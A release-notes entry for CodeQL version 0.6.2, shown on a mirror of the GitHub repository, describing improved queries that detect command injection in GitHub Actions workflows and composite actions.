codeql/0.6.2.md at codeql-cli-2.20.6

hohn/codeql

mirror of https://github.com/github/codeql.git synced 2025-12-17 17:23:36 +01:00

Files

github-actions[bot] 7aa23cf11d Release preparation for version 2.13.3

2023-05-22 20:47:00 +00:00

0.6.2

Improved the queries for injection vulnerabilities in GitHub Actions workflows (js/actions/command-injection and js/actions/pull-request-target) and the associated library semmle.javascript.Actions. These now support steps defined in composite actions, in addition to steps defined in Actions workflow files. It supports more potentially untrusted input values. Additionally to the shell injections it now also detects injections in actions/github-script. It also detects simple injections from user controlled ${{ env.name }}. Additionally to the yml extension now it also supports workflows with the yaml extension.